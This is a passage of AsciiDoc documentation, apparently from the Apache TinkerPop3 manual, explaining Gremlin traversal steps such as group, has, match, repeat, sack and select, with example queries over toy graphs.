4 characters).\n<4> What is the total age of the people in the graph?\n<5> The same as before, but using a built-in bi-function.\n<6> The same as before, but using the <<sum-step,`sum()`-step>>.\n\n[[group-step]]\nGroup Step\n~~~~~~~~~~\n\nAs traversers propagate across a graph as defined by a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(label) <1>\ng.V().group().by(label).by('name') <2>\ng.V().group().by(label).by('name').by(count(local)) <3>\n----\n\n<1> Group the vertices by their label.\n<2> For each vertex in the group, get their name.\n<3> For each grouping, what is its size?\n\nThe three projection parameters available to `group()` via `by()` are:\n\n. Key-projection: What feature of the object to group on (a function that yields the map key)?\n. Value-projection: What feature of the group to store in the key-list?\n. Reduce-projection: What feature of the key-list to ultimately return?\n\nWARNING: The `group()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal grouping only occurs at the the current processing vertex and thus, is not a global operation as it in Gremlin OLTP. However, `GroupMapReduce` provides unified groups at the end of the traversal computation.\n\n[[groupcount-step]]\nGroupCount Step\n~~~~~~~~~~~~~~~\n\nWhen it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.\n\n\t\"What is the distribution of ages in the graph?\"\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').values('age').groupCount()\ng.V().hasLabel('person').groupCount().by('age') <1>\n----\n\n<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.\n\nThere is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.\n\n\t\"Iteratively walk the graph and count the number of times you see the second letter of each name.\"\n\nimage::groupcount-step.png[width=420]\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')\n----\n\nThe above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable. Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.\n\nWARNING: The `groupCount()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal grouping only occurs at the the current processing vertex and thus, is not a global operation as it in Gremlin OLTP. However, `GroupCountMapReduce` provides unified groups at the end of the traversal computation.\n\n[[has-step]]\nHas Step\n~~~~~~~~\n\nimage::has-step.png[width=670]\n\nIt is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). There are numerous variations on `has()` including:\n\n * `has(key,value)`: Remove the traverser if its element does not have the provided key\/value property.\n * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.\n * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.\n * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.\n * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.\n * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.\n * `has(key)`: Remove the traverser if its element has a value for the key.\n * `hasNot(key)`: Remove the traverser if its element does not have a value for the key.\n * `has(traversal)`: Remove the traverser if its object does not yield a result through the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person')\ng.V().hasLabel('person').out().has('name',within('vadas','josh'))\ng.V().hasLabel('person').out().has('name',within('vadas','josh')).\n outE().hasLabel('created')\ng.V().has('age',inside(20,30)).values('age') <1>\ng.V().has('age',outside(20,30)).values('age') <2>\n----\n\n<1> Find all vertices whose ages are between 20 (inclusive) and 30 (exclusive).\n<2> Find all vertices whose ages are not between 20 (inclusive) and 30 (exclusive).\n\nIt is also possible to filter any arbitrary object based on a anonymous traversal yielding at least one result.\n\n[gremlin-groovy,modern]\n----\ng.V().has(out('created')).values('name') <1>\ng.V().out('knows').has(out('created')).values('name') <2>\ng.V().has(out('created').count().is(gte(2L))).values('name') <3>\ng.V().has(out('knows').has(out('created'))).values('name') <4>\n----\n\n<1> What are the names of the people who have created a project?\n<2> What are the names of the people that are known by someone one and have created a project?\n<3> What are the names of the people how have created two or more projects?\n<4> What are the names of the people who know someone that has created a project? (This only works in OLTP -- see the `WARNING` below)\n\nWARNING: The anonymous traversal of `has()` processes the current object \"locally\". In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[inject-step]]\nInject Step\n~~~~~~~~~~~\n\nimage::inject-step.png[width=800]\n\nOne of the major features of TinkerPop3 is \"injectable steps.\" This makes it possible to insert objects arbitrarily into a traversal stream. In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(4).out().values('name').inject('daniel')\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()\n----\n\nIn the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.\n\n[gremlin-groovy,modern]\n----\ninject(1,2)\ninject(1,2).map {it.get() + 1}\ninject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')\n----\n\n[[is-step]]\nIs Step\n~~~~~~~\n\nIt is possible to filter scalar values using `is()`-step (*filter*).\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').is(32)\ng.V().values('age').is(lte(30))\ng.V().values('age').is(inside(30, 40))\ng.V().has(__.in('created').count().is(1l)).values('name') <1>\ng.V().has(__.in('created').count().is(gte(2l))).values('name') <2>\ng.V().has(__.in('created').values('age').\n mean().is(inside(30d, 35d))).values('name') <3>\n----\n\n<1> Find projects having exactly one contributor.\n<2> Find projects having two or more contributors.\n<3> Find projects whose contributors average age is between 30 and 35.\n\n[[limit-step]]\nLimit Step\n~~~~~~~~~~\n\nThe `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.\n\n[gremlin-groovy,modern]\n----\ng.V().limit(2)\ng.V().range(0, 2)\ng.V().limit(2).toString()\n----\n\n[[local-step]]\nLocal Step\n~~~~~~~~~~\n\nimage::local-step.png[width=450]\n\nA `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().as('person').\n properties('location').order().by('startTime',incr).limit(2).\n value().as('location').select().by('name').by() <1>\ng.V().as('person').\n local(properties('location').order().by('startTime',incr).limit(2)).\n value().as('location').select().by('name').by() <2>\n----\n\n<1> Get the first two people and their respective location according to the most historic location start time.\n<2> For every person, get their two most historic locations.\n\nThe two traversals above look nearly identical save the inclusion of `local()` which wraps a section of the traversal in a object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.\n\nWARNING: The anonymous traversal of `local()` processes the current object \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[match-step]]\nMatch Step\n~~~~~~~~~~\n\nThe `match()`-step (*map*) is introduced into TinkerPop3 to support a more link:http:\/\/en.wikipedia.org\/wiki\/Declarative_programming[declarative] form of link:http:\/\/en.wikipedia.org\/wiki\/Pattern_matching[pattern matching]. Similar constructs were available in previous TinkerPop versions via the `table()`-step, but that has since been removed in favor of the `match().select()`-pattern. With MatchStep in TinkerPop, a query optimizer similar to the link:http:\/\/www.knowledgefrominformation.com\/2011\/04\/16\/budget-match-cost-effective-subgraph-matching-on-large-networks\/[budget match algorithm] builds and revises query plans on the fly, while a query is in progress. For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.\n\n\t\"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators.\"\n\nimage::match-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').has('name', 'lop'),\n __.as('b').in('created').as('c'),\n __.as('c').has('age', 29)).select('a','c').by('name')\n----\n\nNote that the above can also be more concisely written as below which demonstrates that imperative inner-traversals can be arbitrarily defined.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').has('name', 'lop').as('b'),\n __.as('b').in('created').has('age', 29).as('c')).select('a','c').by('name')\n----\n\n[[grateful-dead]]\n.Grateful Dead\nimage::grateful-dead-schema.png[width=475]\n\nMatchStep brings functionality similar to link:http:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data\/` directory): \n\n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().match('a',\n __.as('a').has('name', 'Garcia'),\n __.as('a').in('writtenBy').as('b'),\n __.as('a').in('sungBy').as('b')).select('b').values('name')\n----\n\nAmong the features which differentiate `match()` from SPARQL are:\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').has('name','lop').as('b'), <1>\n __.as('b').in('created').has('age', 29).as('c'),\n __.as('c').repeat(out()).times(2)). <2>\n select('c').out('knows').dedup().values('name') <3>\n----\n\n<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.\n<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.\n<3> *Imperative\/declarative hybrid*: Pre and prior to a `match()`, it is possible to leverage classic Gremlin imperative.\n\nTo extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop')).\n select('b').out('created').\n match('a',\n __.as('a').in('created').as('b'),\n __.as('b').out('knows').as('c')).\n select('c').values('name')\n----\n\nLike all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. recursive matching).\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('knows').as('b'),\n __.as('b').out('created').has('name','lop'),\n __.as('b').match('x',\n __.as('x').out('created').as('y'),\n __.as('y').has('name','ripple')).\n select('y').as('c')).\n select('a','c').by('name')\n----\n\nWARNING: Currently, `match()` does not operate within a multi-JVM <<graphcomputer,GraphComputer>> OLAP environment. Future work includes a linearization <<traversalstrategy,TraversalStrategy>> for `match()`.\n\n[[using-where-with-match]]\nUsing Where with Match\n^^^^^^^^^^^^^^^^^^^^^^\n\nMatch is typically used in conjunction with both `select()` (demonstrated previously) and `where()` (presented here). A `where()` allows the user to further constrain the result set provided by `match()`.\n\n[gremlin-groovy,modern]\n----\ng.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where('a', neq('c')).select('a','c').by('name')\n----\n\nThe `where()`-step can take either a `BiPredicate` (first example below) or a `Traversal` (second example below). Using `MatchWhereStrategy`, `where()`-clauses can be automatically folded into `match()` and thus, subject to `match()`-steps budget-match algorithm.\n\n[gremlin-groovy,modern]\n----\ntraversal = g.V().match('a',\n __.as('a').out('created').as('b'),\n __.as('b').in('created').as('c')).\n where(__.as('a').out('knows').as('c')). <1>\n select('a','c').by('name'); null <2>\ntraversal.toString() <3>\ntraversal <4> <5>\ntraversal.toString() <6>\n----\n\n<1> A `where()`-step with a traversal containing variable bindings declared in `match()`.\n<2> A useful trick to ensure that that the traversal is not iterated by Gremlin Console.\n<3> The string representation of the traversal prior to its strategies being applied.\n<4> The Gremlin Console will automatically iterate anything that is an iterator or is iterable.\n<5> Both marko and josh are co-developers and marko knows josh.\n<6> The string representation of the traversal after the strategies have been applied (and thus, `where()` is folded into `match()`)\n\n[[max-step]]\nMax Step\n~~~~~~~~\n\nThe `max()`-step (*map*) operates on a stream of numbers and determines which is the largest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').max()\ng.V().repeat(both()).times(3).values('age').max()\n----\n\nIMPORTANT: `max(local)` determines the max of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a max of `Double.NaN` is returned.\n\n[[mean-step]]\nMean Step\n~~~~~~~~~\n\nThe `mean()`-step (*map*) operates on a stream of numbers and determines the average of those numbers.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').mean()\ng.V().repeat(both()).times(3).values('age').mean() <1>\ng.V().repeat(both()).times(3).values('age').dedup().mean()\n----\n\n<1> Realize that traversers are being bulked by `repeat()`. There may be more of a particular number than another, thus altering the average.\n\nIMPORTANT: `mean(local)` determines the mean of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a mean of `Double.NaN` is returned.\n\n[[min-step]]\nMin Step\n~~~~~~~~\n\nThe `min()`-step (*map*) operates on a stream of numbers and determines which is the smallest number in the stream.\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').min()\ng.V().repeat(both()).times(3).values('age').min()\n----\n\nIMPORTANT: `min(local)` determines the min of the current, local object (not the objects in the traversal stream). This works for `Collection` and `Number`-type objects. For any other object, a min of `Double.NaN` is returned.\n\n[[or-step]]\nOr Step\n~~~~~~~\n\nThe `or()`-step ensures that at least one of the provided traversals yield a result (*filter*). Please see <<and-step,`and()`>> for and-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().or(\n __.outE('created'),\n __.inE('created').count().is(gt(1l))).\n values('name')\n----\n\nThe `or()`-step can take an arbitrary number of traversals. At least one of the traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be or'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().has(outE('created').or().outE('knows')).values('name')\n----\n\n[[order-step]]\nOrder Step\n~~~~~~~~~~\n\nWhen the objects of the traversal stream need to be sorted, `order()`-step (*map*) can be leveraged.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name').order()\ng.V().values('name').order().by(decr)\ng.V().hasLabel('person').order().by('age', incr).values('name')\n----\n\nOne of the most traversed objects in a traversal is an `Element`. An element can have properties associated with it (i.e. key\/value pairs). In many situations, it is desirable to sort an element traversal stream according to a comparison of their properties.\n\n[gremlin-groovy,modern]\n----\ng.V().values('name')\ng.V().order().by('name',incr).values('name')\ng.V().order().by('name',decr).values('name')\n----\n\nThe `order()`-step allows the user to provide an arbitrary number of comparators for primary, secondary, etc. sorting. In the example below, the primary ordering is based on the outgoing created-edge count. The secondary ordering is based on the age of the person.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', incr).values('name')\ng.V().hasLabel('person').order().by(outE('created').count(), incr).\n by('age', decr).values('name')\n----\n\nRandomizing the order of the traversers at a particular point in the traversal is possible with `Order.shuffle`.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').order().by(shuffle)\ng.V().hasLabel('person').order().by(shuffle)\n----\n\nIMPORTANT: `order(local)` orders the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, the object is returned unchanged.\n\n[[path-step]]\nPath Step\n~~~~~~~~~\n\nA traverser is transformed as it moves through a series of steps within a traversal. The history of the traverser is realized by examining its path with `path()`-step (*map*).\n\nimage::path-step.png[width=650]\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().values('name')\ng.V().out().out().values('name').path()\n----\n\nIf edges are required in the path, then be sure to traverser those edges explicitly.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().inV().outE().inV().path()\n----\n\nIt is possible to post-process the elements of the path in a round-robin fashion via `by()`.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by('name').by('age')\n----\n\nFinally, because `by()`-based post-processing, nothing prevents triggering yet another traversal. In the traversal below, for each element of the path traversed thus far, if its a person (as determined by having an `age`-property), then get all of their creations, else if its a creation, get all the people that created it.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out().path().by(\n choose(hasLabel('person'),\n out('created').values('name'),\n __.in('created').values('name')).fold())\n----\n\nWARNING: Generating path information is expensive as the history of the traverser is stored into a Java list. With numerous traversers, there are numerous lists. Moreover, in an OLAP <<graphcomputer,`GraphComputer`>> environment this becomes exceedingly prohibitive as there are traversers emanating from all vertices in the graph in parallel. In OLAP there are optimizations provided for traverser populations, but when paths are calculated (and each traverser is unique due to its history), then these optimizations are no longer possible.\n\n[[path-data-structure]]\nPath Data Structure\n^^^^^^^^^^^^^^^^^^^\n\nThe `Path` data structure is an ordered list of objects, where each object is associated to a `Set<String>` of labels. An example is presented below to demonstrate both the `Path` API as well as how a traversal yields labeled paths.\n\nimage::path-data-structure.png[width=350]\n\n[gremlin-groovy,modern]\n----\npath = g.V(1).as('a').has('name').as('b').\n out('knows').out('created').as('c').\n has('name','ripple').values('name').as('d').\n identity().as('e').path().next()\npath.size()\npath.objects()\npath.labels()\npath.a\npath.b\npath.c\npath.d == path.e\n----\n\n[[profile-step]]\nProfile Step\n~~~~~~~~~~~~\n\nThe `profile()`-step (*sideEffect*) exists to allow developers to profile their traversals to determine statistical information like step runtime, counts, etc.\n\nWARNING: Profiling a Traversal will impede the Traversal's performance. This overhead is mostly excluded from the profile results, but durations are not exact. Thus, durations are best considered in relation to each other.\n\n[gremlin-groovy,modern]\n----\ng.V().out('created').repeat(both()).times(3).hasLabel('person').values('age').sum().profile().cap(TraversalMetrics.METRICS_KEY)\n----\n\nThe `profile()`-step generates a `TraversalMetrics` sideEffect object that contains the following information:\n\n* `Step`: A step within the traversal being profiled.\n* `Count`: The number of _represented_ traversers that passed through the step.\n* `Traversers`: The number of traversers that passed through the step.\n* `Time (ms)`: The total time the step was actively executing its behavior.\n* `% Dur`: The percentage of total time spent in the step.\n\nimage:gremlin-exercise.png[width=120,float=left] It is important to understand the difference between `Count` and `Traversers`. Traversers can be merged and as such, when two traversers are \"the same\" they may be aggregated into a single traverser. That new traverser has a `Traverser.bulk()` that is the sum of the two merged traverser bulks. On the other hand, the `Count` represents the sum of all `Traverser.bulk()` results and thus, expresses the number of \"represented\" (not enumerated) traversers. `Traversers` will always be less than or equal to `Count`.\n\n[[range-step]]\nRange Step\n~~~~~~~~~~\n\nAs traversers propagate through the traversal, it is possible to only allow a certain number of them to pass through with `range()`-step (*filter*). When the low-end of the range is not met, objects are continued to be iterated. When within the low and high range (both inclusive), traversers are emitted. Finally, when above the high range, the traversal breaks out of iteration.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0,3)\ng.V().range(1,3)\ng.V().repeat(both()).times(1000000).emit().range(6,10)\n----\n\n[[repeat-step]]\nRepeat Step\n~~~~~~~~~~~\n\nimage::gremlin-fade.png[width=350]\n\nThe `repeat()`-step (*branch*) is used for looping over a traversal given some break predicate. Below are some examples of `repeat()`-step in action.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).path().by('name') <1>\ng.V().until(has('name','ripple')).\n repeat(out()).path().by('name') <2>\n----\n\n<1> do-while semantics stating to do `out()` 2 times.\n<2> while-do semantics stating to break if the traverser is at a vertex named \"ripple\".\n\nIMPORTANT: There are two modulators for `repeat()`: `until()` and `emit()`. If `until()` comes after `repeat()` it is do\/while looping. If `until()` comes before `repeat()` it is while\/do looping. If `emit()` is placed after `repeat()`, it is evaluated on the traversers leaving the repeat-traversal. If `emit()` is placed before `repeat()`, it is evaluated on the traversers prior to entering the repeat-traversal.\n\nThe `repeat()`-step also supports an \"emit predicate\", where the predicate for an empty argument `emit()` is true (i.e. `emit() == emit{true}`). With `emit()`, the traverser is split in two -- the traverser exits the code block as well as continues back within the code block (assuming `until()` holds true).\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name') <1>\ng.V(1).emit().repeat(out()).times(2).path().by('name') <2>\n----\n\n<1> The `emit()` comes after `repeat()` and thus, emission happens after the `repeat()` traversal is executed. Thus, no one vertex paths exist.\n<2> The `emit()` comes before `repeat()` and thus, emission happens prior to the `repeat()` traversal being executed. Thus, one vertex paths exist.\n\nThe `emit()`-modulator can take an arbitrary predicate.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit(has('lang')).path().by('name')\n----\n\nimage::repeat-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).times(2).emit().path().by('name')\n----\n\nThe first time through the `repeat()`, the vertices lop, vadas, and josh are seen. Given that `loops==0`, the traverser repeats. However, because the emit-predicate is declared true, those vertices are emitted. At step 2 (`loops==1`), the vertices traversed are ripple and lop (Josh's created projects, as lop and vadas have no out edges) and are also emitted. Now `loops==1` so the traverser repeats. As ripple and lop have no out edges there are no vertices to traverse. Given that `loops==2`, the until-predicate fails. Therefore, the traverser has seen the vertices: lop, vadas, josh, ripple, and lop.\n\nFinally, note that both `emit()` and `until()` can take a traversal and in such, situations, the predicate is determined by `traversal.hasNext()`. A few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(out()).until(hasLabel('software')).path().by('name') <1>\ng.V(1).emit(hasLabel('person')).repeat(out()).path().by('name') <2>\ng.V(1).repeat(out()).until(outE().count().is(0L)).path().by('name') <3>\n----\n\n<1> Starting from vertex 1, keep taking outgoing edges until a software vertex is reached.\n<2> Starting from vertex 1, and in an infinite loop, emit the vertex if it is a person and then traverser the outgoing edges.\n<3> Starting from vertex 1, keep taking outgoing edges until a vertex is reached that has no more outgoing edges.\n\nWARNING: The anonymous traversal of `emit()` and `until()` (not `repeat()`) process their current objects \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversals do not leave the confines of the vertex's star graph. In other words, they can not traverse to an adjacent vertex's properties or edges.\n\n[[sack-step]]\nSack Step\n~~~~~~~~~\n\nimage:gremlin-sacks-running.png[width=175,float=right] A traverser can contain a local data structure called a \"sack\". The `sack()`-step is used to read and write sacks (*sideEffect* or *map*). Each sack of each traverser is created when using `GraphTraversal.withSack(initialValueSupplier,splitOperator?)`.\n\n* *Initial value supplier*: A `Supplier` providing the initial value of each traverser's sack.\n* *Split operator*: a `UnaryOperator` that clones the traverser's sack when the traverser splits. If no split operator is provided, then `UnaryOperator.identity()` is assumed.\n\nTwo trivial examples are presented below to demonstrate the *initial value supplier*. In the first example below, a traverser is created at each vertex in the graph (`g.V()`), with a 1.0 sack (`withSack(1.0f)`), and then the sack value is accessed (`sack()`). In the second example, a random float supplier is used to generate sack values.\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().sack()\nrand = new Random()\ng.withSack {rand.nextFloat()}.V().sack()\n----\n\nA more complicated initial value supplier example is presented below where the sack values are used in a running computation and then emitted at the end of the traversal. When an edge is traversed, the edge weight is multiplied by the sack value (`sack(mult,'weight')`).\n\n[gremlin-groovy,modern]\n----\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2)\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).sack()\ng.withSack(1.0f).V().repeat(outE().sack(mult,'weight').inV()).times(2).path().\n by().by('weight')\n----\n\nimage:gremlin-sacks-standing.png[width=100,float=left] When complex objects are used (i.e. non-primitives), then a *split operator* should be defined to ensure that each traverser gets a clone of its parent's sack. The first example does not use a split operator and as such, the same map is propagated to all traversers (a global data structure). The second example, demonstrates how `Map.clone()` ensures that each traverser's sack contains a unique, local sack.\n\n[gremlin-groovy,modern]\n----\ng.withSack {[:]}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ BAD: single map\ng.withSack {[:]}{it.clone()}.V().out().out().\n sack {m,v -> m[v.value('name')] = v.value('lang'); m}.sack() \/\/ GOOD: cloned map\n----\n\nNOTE: For primitives (i.e. integers, longs, floats, etc.), a split operator is not required as a primitives are encoded in the memory address of the sack, not as a reference to an object.\n\n[[sample-step]]\nSample Step\n~~~~~~~~~~~\n\nThe `sample()`-step is useful for sampling some number of traversers previous in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().sample(1).values('weight')\ng.V().outE().sample(1).by('weight').values('weight')\ng.V().outE().sample(2).by('weight').values('weight')\n----\n\nOne of the more interesting use cases for `sample()` is when it is used in conjunction with <<local-step,`local()`>>. The combination of the two steps supports the execution of link:http:\/\/en.wikipedia.org\/wiki\/Random_walk[random walks]. In the example below, the traversal starts are vertex 1 and selects one edge to traverse based on a probability distribution generated by the weights of the edges. The output is always a single path as by selecting a single edge, the traverser never splits and continues down a single path in the graph.\n\n[gremlin-groovy,modern]\n----\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5)\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(5).path()\ng.V(1).repeat(local(\n bothE().sample(1).by('weight').otherV()\n )).times(10).path()\n----\n\n[[select-step]]\nSelect Step\n~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Functional_programming[Functional languages] make use of function composition and lazy evaluation to create complex computations from primitive operations. This is exactly what `Traversal` does. One of the differentiating aspects of Gremlin's data flow approach to graph processing is that the flow need not always go \"forward,\" but in fact, can go back to a previously seen area of computation. Examples include <<path-step,`path()`>> as well as the `select()`-step (*map*). There are two general ways to use `select()`-step.\n\n. Select labeled steps within a path (as defined by `as()` in a traversal).\n. Select objects out of a `Map<String,Object>` flow (i.e. a sub-map).\n\nThe first use case is demonstrated via example below.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b').out().as('c') \/\/ no select\ng.V().as('a').out().as('b').out().as('c').select()\ng.V().as('a').out().as('b').out().as('c').select('a','b')\ng.V().as('a').out().as('b').out().as('c').select('a','b').by('name')\ng.V().as('a').out().as('b').out().as('c').select('a') <1>\n----\n\n<1> If the selection is one step, no map is returned.\n\nWhen there is only one label selected, then a single object is returned. This is useful for stepping back in a computation and easily moving forward again on the object reverted to.\n\n[gremlin-groovy,modern]\n----\ng.V().out().out()\ng.V().out().out().path()\ng.V().as('x').out().out().select('x')\ng.V().out().as('x').out().select('x')\ng.V().out().out().as('x').select('x') \/\/ pointless\n----\n\nThe second use case is best understood in terms of <<match-step,`match()`>>-step where the result of `match()` is a `Map<String,Object>` of variable bindings. However, any step that emits a `Map<String,Object>` can be selected. A contrived example is presented below.\n\n[gremlin-groovy,modern]\n----\ng.V().range(0, 2).as('a').map {[b:1,c:2]} <1>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local) <2>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'a','c') <3>\ng.V().range(0, 2).as('a').map {[b:1,c:2]}.select(local,'c') <4>\n----\n\n<1> A contrived example to create a `Map<String,Object>` flow as a foundation for the examples to follow.\n<2> Select will grab both labeled steps and `Map<String,Object>` entries.\n<3> The same `List<String>` selectivity can be used as demonstrated in the previous example.\n<4> If a single selection is used, then the object is emitted not wrapped in a map. Useful for continuing the traversal process without having to do a map projection.\n\nNOTE: When executing a traversal with `select()` on a standard traversal engine (i.e. OLTP), `select()` will do its best to avoid calculating the path history and instead, will rely on a global data structure for storing the currently selected object. As such, if only a subset of the path walked is required, `select()` should be used over the more resource intensive <<path-step,`path()`>>-step.\n\n[[using-where-with-select]]\nUsing Where with Select\n^^^^^^^^^^^^^^^^^^^^^^^\n\nFinally, like <<match-step,`match()`>>-step, it is possible to use `where()`, as where is a filter that processes `Map<String,Object>` streams.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').in('created').as('b').select().by('name') <1>\ng.V().as('a').out('created').in('created').as('b').\n select().by('name').where('a',neq('b')) <2>\ng.V().as('a').out('created').in('created').as('b').\n select(). <3>\n where('a',neq('b')).\n where(__.as('a').out('knows').as('b')).\n select().by('name')\n----\n\n<1> A standard `select()` that generates a `Map<String,Object>` of variables bindings in the path (i.e. `a` and `b`) for the sake of a running example.\n<2> The `select().by('name')` projects each binding vertex to their name property value and `where()` operates to ensure respective `a` and `b` strings are not the same.\n<3> The first `select()` projects a vertex binding set. A binding is filtered if `a` vertex equals `b` vertex. A binding is filtered if `a` doesn't know `b`. The second and final `select()` projects the name of the vertices.\n\n[[simplepath-step]]\nSimplePath Step\n~~~~~~~~~~~~~~~\n\nimage::simplepath-step.png[width=400]\n\nWhen it is important that a traverser not repeat its path through the graph, `simplePath()`-step should be used (*filter*). The <<path-data-structure,path>> information of the traverser is analyzed and if the path has repeated objects in it, the traverser is filtered. If cyclic behavior is desired, see <<cyclicpath-step,`cyclicPath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().simplePath()\ng.V(1).both().both().simplePath().path()\n----\n\n[[store-step]]\nStore Step\n~~~~~~~~~~\n\nWhen link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazy] aggregation is needed, `store()`-step (*sideEffect*) should be used over <<aggregate-step,`aggregate()`>>. The two steps differ in that `store()` does not block and only stores objects in its side-effect collection as they pass through.\n\n[gremlin-groovy,modern]\n----\ng.V().aggregate('x').limit(1).cap('x')\ng.V().store('x').limit(1).cap('x')\n----\n\nIt is interesting to note that there are three results in the `store()` side-effect even though the interval selection is for 2 objects. Realize that when the third object is on its way to the `range()` filter (i.e. `[0..1]`), it passes through `store()` and thus, stored before 